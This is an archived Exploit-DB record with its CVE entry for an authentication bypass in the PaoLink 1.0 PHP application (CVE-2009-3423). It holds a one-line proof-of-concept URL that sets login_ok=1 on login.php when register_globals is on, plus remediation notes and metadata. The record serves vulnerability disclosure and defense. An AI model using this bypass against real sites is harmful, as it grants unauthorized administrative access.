ID EDB-ID:9292
Type exploitdb
Reporter SirGod
Modified 2009-07-28T00:00:00
Description
PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability (CVE-2009-3423). Web application exploit for the PHP platform. Per the CVE record, login.php is affected only when register_globals is enabled.
#############################################################################
[+] PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#############################################################################
download : http://zenas.org/paobacheca/download/scarica.html
[+] Authentication Bypass Vulnerability
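- Notes : register_globals = on
  (Precondition: with this PHP setting, request parameters are imported as global variables, so a client can supply login_ok, which login.php apparently trusts without initializing it server-side. register_globals was deprecated in PHP 5.3 and removed in PHP 5.4. On older installs, disable it and keep login state in the server-side session.)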
- PoC :
http://127.0.0.1/[path]/login.php?login_ok=1
#############################################################################
# milw0rm.com [2009-07-28]
{"bulletinFamily": "exploit", "id": "EDB-ID:9292", "cvelist": ["CVE-2009-3423"], "modified": "2009-07-28T00:00:00", "lastseen": "2016-02-01T10:16:46", "edition": 1, "sourceData": "#############################################################################\n[+] PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability\n[+] Discovered By SirGod\n[+] http://insecurity-ro.org\n[+] http://h4cky0u.org\n#############################################################################\n\ndownload : http://zenas.org/paobacheca/download/scarica.html\n\n[+] Authentication Bypass Vulnerability\n\n\n - Notes : register_globals = on\n\n\n - PoC :\n\n http://127.0.0.1/[path]/login.php?login_ok=1\n\n#############################################################################\n\n# milw0rm.com [2009-07-28]\n", "published": "2009-07-28T00:00:00", "href": "https://www.exploit-db.com/exploits/9292/", "osvdbidlist": ["56756"], "reporter": "SirGod", "hash": "2de71cef60efacab2b7eb538e58a6975344802850e01c906d3da88ad986b907a", "title": "PaoLink 1.0 login_ok Authentication Bypass Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability. CVE-2009-3423. Webapps exploit for php platform", "references": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9292/", "enchantments": {"vulnersScore": 4.0}}
{"result": {"cve": [{"id": "CVE-2009-3423", "type": "cve", "title": "CVE-2009-3423", "description": "login.php in Zenas PaoLink 1.0, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1.", "published": "2009-09-25T18:30:16", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3423", "cvelist": ["CVE-2009-3423"], "lastseen": "2017-09-19T13:36:39"}]}}